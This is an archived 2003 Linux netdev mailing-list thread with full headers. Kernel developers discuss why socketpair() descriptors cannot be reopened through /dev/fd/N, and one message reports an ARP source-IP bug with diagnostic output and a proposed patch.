X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-archive-position: 4246
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: davem@redhat.com
Precedence: bulk
X-list: netdev

On Wed, 23 Jul 2003 10:28:22 -0400 (EDT)
David Korn wrote:

> This makes sense for INET sockets, but I don't understand the security
> considerations for UNIX domain sockets. Could you please elaborate?
> Moreover, /dev/fd/n (as opposed to /proc/$$/fd/n) is restricted to
> the current process and its descendants if close-on-exec is not specified.
> Again, I don't understand why this would create a security problem
> either, since the socket is already accessible via the original
> descriptor.

Someone else would have to comment, but I do know we've had this
behavior since day one.

And therefore I wouldn't be doing many people much of a favor by
changing the behavior today. What would people do who need their
things to work on the bazillion existing linux kernels running out
there? :-)

Also, see below for another reason why this behavior is unlikely
to change.

> Finally, if this is a security problem, why is errno set to ENXIO
> rather than EACCES?

Look at the /proc file we put there for socket FD's. It's a symbolic
link with a readable string of the form:

	("socket:[%d]", inode_nr)

So your program ends up doing a follow of a symbolic link with that
string name, which does not exist.

Thinking more about this, changing this behavior would probably break
more programs than it would help begin to function, so this is unlikely
to ever change.

From carlosev@newipnet.com Wed Jul 23 08:20:16 2003
Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 08:20:28 -0700 (PDT)
Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NFJXFl029122
    for ; Wed, 23 Jul 2003 08:20:15 -0700
Received: by smtp.newipnet.com (ESMTP Server, from userid 511)
    id D9EF920776; Wed, 23 Jul 2003 17:19:31 +0200 (CEST)
Received: from madre (madre.newipnet.com [192.168.128.4])
    by smtp.newipnet.com (ESMTP Server) with ESMTP id C71FC207AB
    for ; Wed, 23 Jul 2003 17:19:17 +0200 (CEST)
Message-ID: <200307231712000985.1CE20A63@192.168.128.16>
X-Mailer: Calypso Version 3.30.00.00 (4)
Date: Wed, 23 Jul 2003 17:12:00 +0200
From: "Carlos Velasco"
To: netdev@oss.sgi.com
Subject: Bug? ARP with wrong src IP address
Mime-Version: 1.0
Content-Type: text/plain; charset="ISO-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6NFJXFl029122
X-archive-position: 4247
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: carlosev@newipnet.com
Precedence: bulk
X-list: netdev

Hi,

Problem Description:

1 ethernet interface IP (eth0): 192.168.128.16 netmask 255.255.255.0
1 loopback address IP (lo:2): 1.1.1.1 netmask 255.255.255.255
1 route to 2.2.2.2 through 192.168.128.60

A packet is sent from the machine with IP 2.2.2.2 to the linux machine,
to dst IP 1.1.1.1 (lo:2), through the ethernet interface (eth0).
When the linux machine tries to find out the MAC address of
192.168.128.60 with ARP, it uses the loopback IP address (lo:2) as
source instead of the IP address of the ethernet interface (eth0).

tcpdump output:

> tcpdump -nei eth0 arp or host 2.2.2.2
tcpdump: listening on eth0
00:29:38.385849 0:c:85:1f:a3:d6 0:48:54:6a:3a:dd 0800 64: 2.2.2.2.55302 > 1.1.1.1.23: S 4186612861:4186612861(0) win 4128 (DF) [tos 0xc0]
00:29:38.386200 0:48:54:6a:3a:dd ff:ff:ff:ff:ff:ff 0806 42: arp who-has 192.168.128.60 tell 1.1.1.1
00:29:39.385310 0:48:54:6a:3a:dd ff:ff:ff:ff:ff:ff 0806 42: arp who-has 192.168.128.60 tell 1.1.1.1

ifconfig output:

> ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:48:54:6A:3A:DD
          inet addr:192.168.128.16  Bcast:192.168.128.255  Mask:255.255.255.0
          inet6 addr: fe80::248:54ff:fe6a:3add/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2695 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2829 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:308510 (301.2 Kb)  TX bytes:353754 (345.4 Kb)
          Interrupt:15 Base address:0xe000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:379 errors:0 dropped:0 overruns:0 frame:0
          TX packets:379 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:136862 (133.6 Kb)  TX bytes:136862 (133.6 Kb)

lo:2      Link encap:Local Loopback
          inet addr:1.1.1.1  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:16436  Metric:1

route print:

> ip route list
2.2.2.2 via 192.168.128.60 dev eth0
192.168.128.0/24 dev eth0  proto kernel  scope link  src 192.168.128.16
default via 192.168.128.200 dev eth0  mtu 300

arp table:

> arp -a
? (192.168.128.202) at 00:30:B6:01:17:80 [ether] on eth0
router.newipnet.com (192.168.128.200) at 00:0C:85:1F:A3:D6 [ether] on eth0
? (192.168.128.60) at <incomplete> on eth0
madre.newipnet.com (192.168.128.4) at 00:E0:7D:7B:D3:8E [ether] on eth0

Steps to reproduce:

1. Set up the loopback interface.
2. Clear the arp table.
3. Set up a route on another PC to reach the loopback address through
   the IP of the ethernet interface of the linux box.
4. Ping the loopback IP address from the other PC.
5. The ARP requests with the wrong source IP address can be seen on the
   linux box with tcpdump or ethereal.

Possible patch (I have tried it and it works, but I do not know if it's 100% accurate):

--- linux-2.6.0-test1/net/ipv4/arp.c	Mon Jul 14 05:37:28 2003
+++ linux-2.6.0-test1-patch/net/ipv4/arp.c	Wed Jul 23 15:31:29 2003
@@ -326,10 +326,14 @@
 	u32 target = *(u32*)neigh->primary_key;
 	int probes = atomic_read(&neigh->probes);
 
+	/* This don't work if the src addr is a loopback or similar.
+	   See http://bugzilla.kernel.org/show_bug.cgi?id=978
+
 	if (skb && inet_addr_type(skb->nh.iph->saddr) == RTN_LOCAL)
 		saddr = skb->nh.iph->saddr;
-	else
-		saddr = inet_select_addr(dev, target, RT_SCOPE_LINK);
+	else */
+
+	saddr = inet_select_addr(dev, target, RT_SCOPE_LINK);
 
 	if ((probes -= neigh->parms->ucast_probes) < 0) {
 		if (!(neigh->nud_state&NUD_VALID))

Bug is reported in bugzilla:
http://bugzilla.kernel.org/show_bug.cgi?id=978

Regards,
Carlos Velasco

From davem@redhat.com Wed Jul 23 08:36:24 2003
Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 08:36:29 -0700 (PDT)
Received: from rth.ninka.net (rth.ninka.net [216.101.162.244])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NFaNFl030697
    for ; Wed, 23 Jul 2003 08:36:24 -0700
Received: from rth.ninka.net (localhost.localdomain [127.0.0.1])
    by rth.ninka.net (8.12.8/8.12.8) with SMTP id h6NFaLIM019053;
    Wed, 23 Jul 2003 08:36:21 -0700
Date: Wed, 23 Jul 2003 08:36:21 -0700
From: "David S. Miller"
To: Alan Cox
Cc: dgk@research.att.com, linux-kernel@vger.kernel.org, gsf@research.att.com, netdev@oss.sgi.com
Subject: Re: kernel bug in socketpair()
Message-Id: <20030723083621.26429e51.davem@redhat.com>
In-Reply-To: <1058970007.5520.68.camel@dhcp22.swansea.linux.org.uk>
References: <200307231332.JAA26197@raptor.research.att.com> <1058970007.5520.68.camel@dhcp22.swansea.linux.org.uk>
X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.10; i686-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-archive-position: 4249
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: davem@redhat.com
Precedence: bulk
X-list: netdev

On 23 Jul 2003 15:20:08 +0100
Alan Cox wrote:

> On Mer, 2003-07-23 at 14:32, David Korn wrote:
> > The first problem is that files created with socketpair() are not accessible
> > via /dev/fd/n or /proc/$$/fd/n where n is the file descriptor returned
> > by socketpair(). Note that this is not a problem with pipe().
>
> This is intentional - sockets do not have an "open" operation currently.

Sure, but we've known this for a long time.

And because we knew, we decided not to add an "open"
method to sockets. The reason, as I remember it, was
security.

Was it not?

From alan@lxorguk.ukuu.org.uk Wed Jul 23 09:19:28 2003
Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 09:19:37 -0700 (PDT)
Received: from lxorguk.ukuu.org.uk (crosslink-village-512-1.bc.nu [81.2.110.254] (may be forged))
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NGJQFl001735
    for ; Wed, 23 Jul 2003 09:19:27 -0700
Received: from dhcp22.swansea.linux.org.uk (dhcp22.swansea.linux.org.uk [127.0.0.1])
    by lxorguk.ukuu.org.uk (8.12.8/8.12.5) with ESMTP id h6NGEVI5006358;
    Wed, 23 Jul 2003 17:14:51 +0100
Received: (from alan@localhost)
    by dhcp22.swansea.linux.org.uk (8.12.8/8.12.8/Submit) id h6NGDeG6006356;
    Wed, 23 Jul 2003 17:13:40 +0100
X-Authentication-Warning: dhcp22.swansea.linux.org.uk: alan set sender to alan@lxorguk.ukuu.org.uk using -f
Subject: Re: kernel bug in socketpair()
From: Alan Cox
To: "David S. Miller"
Cc: dgk@research.att.com, Linux Kernel Mailing List , gsf@research.att.com, netdev@oss.sgi.com
In-Reply-To: <20030723083621.26429e51.davem@redhat.com>
References: <200307231332.JAA26197@raptor.research.att.com> <1058970007.5520.68.camel@dhcp22.swansea.linux.org.uk> <20030723083621.26429e51.davem@redhat.com>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
Organization:
Message-Id: <1058976818.5520.91.camel@dhcp22.swansea.linux.org.uk>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.2.2 (1.2.2-5)
Date: 23 Jul 2003 17:13:40 +0100
X-archive-position: 4250
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: alan@lxorguk.ukuu.org.uk
Precedence: bulk
X-list: netdev

On Mer, 2003-07-23 at 16:36, David S. Miller wrote:
> > This is intentional - sockets do not have an "open" operation currently.
>
> Sure, but we've known this for a long time.
>
> And because we knew, we decided not to add an "open"
> method to sockets. The reason, as I remember it, was
> security.
>
> Was it not?

Mostly, if I remember rightly, it was that if you don't do the check,
then because there is no open operation to create a new instance, you
crash the box.

HPA did have some sensible ideas about how to do "open" on AF_UNIX
sockets, but for the others it's really unclear quite what "open" means.

From gsf@research.att.com Wed Jul 23 09:56:19 2003
Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 09:56:24 -0700 (PDT)
Received: from linux.research.att.com (H-135-207-24-16.research.att.com [135.207.24.16])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NGuIFl004226
    for ; Wed, 23 Jul 2003 09:56:19 -0700
Received: from raptor.research.att.com (raptor.research.att.com [135.207.23.32])
    by linux.research.att.com (8.12.8/8.12.8) with ESMTP id h6NHDLJh027976;
    Wed, 23 Jul 2003 13:13:21 -0400
Received: (from gsf@localhost)
    by raptor.research.att.com (SGI-8.9.3p2/8.8.7) id MAA69129;
    Wed, 23 Jul 2003 12:56:12 -0400 (EDT)
Date: Wed, 23 Jul 2003 12:56:12 -0400 (EDT)
From: Glenn Fowler
Message-Id: <200307231656.MAA69129@raptor.research.att.com>
Organization: AT&T Labs Research
X-Mailer: mailx (AT&T/BSD) 9.9 2003-01-17
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com>
To: davem@redhat.com, dgk@research.att.com
Subject: Re: kernel bug in socketpair()
Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com
X-archive-position: 4251
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: gsf@research.att.com
Precedence: bulk
X-list: netdev

you can eliminate the security implications for all fd types by simply
translating open("/dev/fd/N",...) to dup(atoi(N)) w.r.t. fd N in the current process the problem is that linux took an implementation shortcut by symlinking /dev/fd/N -> /proc/self/fd/N and by the time the kernel sees /proc/self/fd/N the "self"-ness is apparently lost, and it is forced to do the security checks if the /proc fd open code has access to the original /proc/PID/fd/N path then it can do dup(atoi(N)) when the PID is the current process without affecting security otherwise there is a bug in the /dev/fd/N -> /proc/self/fd/N implementation and /dev/fd/N should be separated out to its (original) dup(atoi(N)) semantics see http://mail-index.netbsd.org/current-users/1994/03/29/0027.html for an early (bsd) discussion of /dev/fd/N vs. /proc/self/fd/N -- Glenn Fowler AT&T Labs Research, Florham Park NJ -- On Wed, 23 Jul 2003 07:46:15 -0700 David S. Miller wrote: > On Wed, 23 Jul 2003 10:28:22 -0400 (EDT) > David Korn wrote: > > This make sense for INET sockets, but I don't understand the security > > considerations for UNIX domain sockets. Could you please elaborate? > > Moreover, /dev/fd/n, (as opposed to /proc/$$/n) is restricted to > > the current process and its decendents if close-on-exec is not specified. > > Again, I don't understand why this would create a security problem > > either since the socket is already accesible via the original > > descriptor. > Someone else would have to comment, but I do know we've had > this behavior since day one. > And therefore I wouldn't be doing many people much of a favor > by changing the behavior today, what will people do who need > their things to work on the bazillion existing linux kernels > running out there? :-) > Also, see below for another reason why this behavior is unlikely > to change. > > Finally if this is a security problem, why is the errno is set to ENXIO > > rather than EACCESS? > Look at the /proc file we put there for socket FD's. 
It's a symbolic > link with a readable string of the form ("socket:[%d]", inode_nr) > So your program ends up doing a follow of a symbolic link with that > string name, which does not exist. > Thinking more about this, changing this behavior would probably break > more programs than it would help begin to function, so this is unlikely > to ever change. From garzik@gtf.org Wed Jul 23 09:59:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 09:59:34 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NGxKFl004669 for ; Wed, 23 Jul 2003 09:59:21 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id C4AB2665B; Wed, 23 Jul 2003 12:59:14 -0400 (EDT) Date: Wed, 23 Jul 2003 12:59:14 -0400 From: Jeff Garzik To: "David S. Miller" Cc: Ben Greear , netdev@oss.sgi.com Subject: Re: netdev_ops? Message-ID: <20030723165914.GA29249@gtf.org> References: <3F1E17BC.30100@candelatech.com> <20030722220745.379a73c6.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030722220745.379a73c6.davem@redhat.com> User-Agent: Mutt/1.3.28i X-archive-position: 4252 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Tue, Jul 22, 2003 at 10:07:45PM -0700, David S. Miller wrote: > On Tue, 22 Jul 2003 22:06:04 -0700 > Ben Greear wrote: > > > Any progress towards getting the netdev_ops into 2.4? > > > > I have several patches that would benefit (in that no new ioctls > > would be needed) if this goes in. > > If anything, it's going to go into 2.6.x first, and then backported > to 2.4.x after it's had a few months of testing and tweaking. Agreed. 
FWIW Matthew and I (and several others) are at OLS and basically out of commission for a week, so pretty-please don't make any major decisions this week ;-) Jeff From davem@redhat.com Wed Jul 23 10:03:01 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 10:03:15 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NH31Fl005105 for ; Wed, 23 Jul 2003 10:03:01 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id KAA10803; Wed, 23 Jul 2003 10:00:43 -0700 Date: Wed, 23 Jul 2003 10:00:43 -0700 From: "David S. Miller" To: Glenn Fowler Cc: dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: kernel bug in socketpair() Message-Id: <20030723100043.18d5b025.davem@redhat.com> In-Reply-To: <200307231656.MAA69129@raptor.research.att.com> References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4253 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 12:56:12 -0400 (EDT) Glenn Fowler wrote: > the problem is that linux took an implementation shortcut by symlinking > /dev/fd/N -> /proc/self/fd/N > and by the time the kernel sees /proc/self/fd/N the "self"-ness is apparently > lost, and it is forced to do the security checks None of this is true. If you open /proc/self/fd/N directly the problem is still there. 
> if the /proc fd open code has access to the original /proc/PID/fd/N path > then it can do dup(atoi(N)) when the PID is the current process without > affecting security If we're talking about the current process, there is no use in using /proc/*/fd/N to open a file descriptor in the first place, you can simply call open(N,...) I've personally always viewed /proc/*/fd/N as a way to see who has various files or sockets open, ie. a debugging tool, not as a generic way for processes to get access to each other's FDs. There is an existing mechanism, a portable non-Linux one, that you can use to do that. Pass the fd over a UNIX domain socket if you want that, truly. That works on every system. From gsf@research.att.com Wed Jul 23 10:24:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 10:24:51 -0700 (PDT) Received: from linux.research.att.com (H-135-207-24-16.research.att.com [135.207.24.16]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NHOgFl006012 for ; Wed, 23 Jul 2003 10:24:43 -0700 Received: from raptor.research.att.com (raptor.research.att.com [135.207.23.32]) by linux.research.att.com (8.12.8/8.12.8) with ESMTP id h6NHfjJh028191; Wed, 23 Jul 2003 13:41:45 -0400 Received: (from gsf@localhost) by raptor.research.att.com (SGI-8.9.3p2/8.8.7) id NAA90957; Wed, 23 Jul 2003 13:24:36 -0400 (EDT) Date: Wed, 23 Jul 2003 13:24:36 -0400 (EDT) From: Glenn Fowler Message-Id: <200307231724.NAA90957@raptor.research.att.com> Organization: AT&T Labs Research X-Mailer: mailx (AT&T/BSD) 9.9 2003-01-17 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> To: davem@redhat.com, gsf@research.att.com Subject: Re: kernel bug in socketpair() Cc: dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com X-archive-position: 
4254 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gsf@research.att.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 10:00:43 -0700 David S. Miller wrote: > On Wed, 23 Jul 2003 12:56:12 -0400 (EDT) > Glenn Fowler wrote: > > the problem is that linux took an implementation shortcut by symlinking > > /dev/fd/N -> /proc/self/fd/N > > and by the time the kernel sees /proc/self/fd/N the "self"-ness is apparently > > lost, and it is forced to do the security checks > None of this is true. If you open /proc/self/fd/N directly the problem > is still there. you missed the point that the original open() call is on /dev/fd/N, not /proc/PID/fd/N; /proc/PID/fd/N only comes into play because the linux implementation foists it on the user > > if the /proc fd open code has access to the original /proc/PID/fd/N path > > then it can do dup(atoi(N)) when the PID is the current process without > > affecting security > If we're talking about the current process, there is no use in using > /proc/*/fd/N to open a file descriptor in the first place, you can > simply call open(N,...) no, in the notation above N is the fd number "so you could simply call dup(N)" here is one reason why /dev/fd/N is useful: /dev/fd/N is the underlying mechanism for implementing the bash and ksh cmd-1 <(cmd-2 ...) ... <(cmd-n ...) each <(cmd-i ...) is converted to a pipe() with the write side getting the output of cmd-i (and marked close on exec) and the read side *not* marked close on exec; cmd-1 is then executed as cmd-1 /dev/fd/PIPE-READ-2 ... 
/dev/fd/PIPE-READ-n where PIPE-READ-i is the fd number of the read side of the pipe for cmd-i From davem@redhat.com Wed Jul 23 10:33:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 10:34:00 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NHXrFl006638 for ; Wed, 23 Jul 2003 10:33:54 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id KAA10931; Wed, 23 Jul 2003 10:31:36 -0700 Date: Wed, 23 Jul 2003 10:31:35 -0700 From: "David S. Miller" To: Glenn Fowler Cc: gsf@research.att.com, dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: kernel bug in socketpair() Message-Id: <20030723103135.3eac4cd2.davem@redhat.com> In-Reply-To: <200307231724.NAA90957@raptor.research.att.com> References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4255 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 13:24:36 -0400 (EDT) Glenn Fowler wrote: > /dev/fd/N is the underlying mechanism for implementing the bash and ksh > > cmd-1 <(cmd-2 ...) ... <(cmd-n ...) > Interesting. I looked at the bash code, and it uses pipes with /dev/fd/N, and for /dev/fd/N which are pipes the open should work under Linux. This is what David Korn said in his original report. 
I guess the part that is left is the fchmod() issue which exists because one inode is used to implement both sides of the pipe under Linux. Was the idea to, since fchmod() on pipes modified both sides, to use UNIX domain sockets to implement this? And that's how you discovered the /dev/fd/N failure for sockets? Another idea is to use named unix sockets. Can that be sufficient to solve your dilemma? From alan@lxorguk.ukuu.org.uk Wed Jul 23 10:56:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 10:56:35 -0700 (PDT) Received: from lxorguk.ukuu.org.uk (crosslink-village-512-1.bc.nu [81.2.110.254] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NHuQFl009499 for ; Wed, 23 Jul 2003 10:56:29 -0700 Received: from dhcp22.swansea.linux.org.uk (dhcp22.swansea.linux.org.uk [127.0.0.1]) by lxorguk.ukuu.org.uk (8.12.8/8.12.5) with ESMTP id h6NHpWI5006453; Wed, 23 Jul 2003 18:51:53 +0100 Received: (from alan@localhost) by dhcp22.swansea.linux.org.uk (8.12.8/8.12.8/Submit) id h6NHogtM006451; Wed, 23 Jul 2003 18:50:42 +0100 X-Authentication-Warning: dhcp22.swansea.linux.org.uk: alan set sender to alan@lxorguk.ukuu.org.uk using -f Subject: Re: kernel bug in socketpair() From: Alan Cox To: Glenn Fowler Cc: davem@redhat.com, dgk@research.att.com, Linux Kernel Mailing List , netdev@oss.sgi.com In-Reply-To: <200307231656.MAA69129@raptor.research.att.com> References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit Organization: Message-Id: <1058982641.5520.98.camel@dhcp22.swansea.linux.org.uk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.2 (1.2.2-5) Date: 23 Jul 2003 18:50:41 +0100 X-archive-position: 4256 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: alan@lxorguk.ukuu.org.uk Precedence: bulk X-list: netdev On Mer, 2003-07-23 
at 17:56, Glenn Fowler wrote: > you can eliminate the security implications for all fd types by > simply translating > open("/dev/fd/N",...) > to > dup(atoi(N)) > w.r.t. fd N in the current process This has very different semantics. Consider lseek(). > otherwise there is a bug in the /dev/fd/N -> /proc/self/fd/N implementation > and /dev/fd/N should be separated out to its (original) dup(atoi(N)) > semantics I don't see a bug. I see differing behaviour between Linux and BSD on a completely non standards defined item. Also btw nobody ever really wrote a /dev/fd/ for Linux - it was just a byproduct of the proc stuff someone noticed. I guess someone could write a Plan-9 style dev/fd or devfdfs for Linux if they wanted. Alan From gsf@research.att.com Wed Jul 23 11:15:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 11:15:09 -0700 (PDT) Received: from linux.research.att.com (H-135-207-24-16.research.att.com [135.207.24.16]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NIF5Fl010955 for ; Wed, 23 Jul 2003 11:15:06 -0700 Received: from raptor.research.att.com (raptor.research.att.com [135.207.23.32]) by linux.research.att.com (8.12.8/8.12.8) with ESMTP id h6NIW6Jh028849; Wed, 23 Jul 2003 14:32:06 -0400 Received: (from gsf@localhost) by raptor.research.att.com (SGI-8.9.3p2/8.8.7) id OAA74344; Wed, 23 Jul 2003 14:14:57 -0400 (EDT) Date: Wed, 23 Jul 2003 14:14:57 -0400 (EDT) From: Glenn Fowler Message-Id: <200307231814.OAA74344@raptor.research.att.com> Organization: AT&T Labs Research X-Mailer: mailx (AT&T/BSD) 9.9 2003-01-17 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> <20030723103135.3eac4cd2.davem@redhat.com> To: davem@redhat.com, gsf@research.att.com Subject: Re: 
kernel bug in socketpair() Cc: dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com X-archive-position: 4257 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gsf@research.att.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 10:31:35 -0700 David S. Miller wrote: > Interesting. > I looked at the bash code, and it uses pipes with /dev/fd/N, and for > /dev/fd/N which are pipes the open should work under Linux. > This is what David Korn said in his original report. > I guess the part that is left is the fchmod() issue which exists > because one inode is used to implement both sides of the pipe under > Linux. > Was the idea to, since fchmod() on pipes modified both sides, > to use UNIX domain sockets to implement this? And that's how > you discovered the /dev/fd/N failure for sockets? fchmod() came into play with socketpair() to get the fd modes to match pipe(); its not needed with pipe() we use socketpair() to allow efficient peeking on pipe input (via recv()), where peek means "read some data but don't advance the read/seek offset" btw, this is on systems that don't allow ioctl(I_PEEK) on pipe() fds; if there is a way to peek pipe() data on linux then we can switch back to pipe() and be on our way > Another idea is to use named unix sockets. Can that be > sufficient to solve your dilemma? named sockets seem a little heavyweight for this application From davem@redhat.com Wed Jul 23 11:25:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 11:25:37 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NIPVFl011822 for ; Wed, 23 Jul 2003 11:25:32 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id LAA11118; Wed, 23 Jul 2003 11:23:07 -0700 Date: Wed, 23 Jul 2003 11:23:07 -0700 From: "David S. 
Miller" To: Glenn Fowler Cc: gsf@research.att.com, dgk@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: kernel bug in socketpair() Message-Id: <20030723112307.5b8ae55c.davem@redhat.com> In-Reply-To: <200307231814.OAA74344@raptor.research.att.com> References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <20030723100043.18d5b025.davem@redhat.com> <200307231724.NAA90957@raptor.research.att.com> <20030723103135.3eac4cd2.davem@redhat.com> <200307231814.OAA74344@raptor.research.att.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4258 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 14:14:57 -0400 (EDT) Glenn Fowler wrote: > named sockets seem a little heavyweight for this application I think it'll be cheaper than unnamed unix sockets and groveling in /proc/*/fd/ And even if there is a minor performance issue, you'll more than get that back due to the portability gain. 
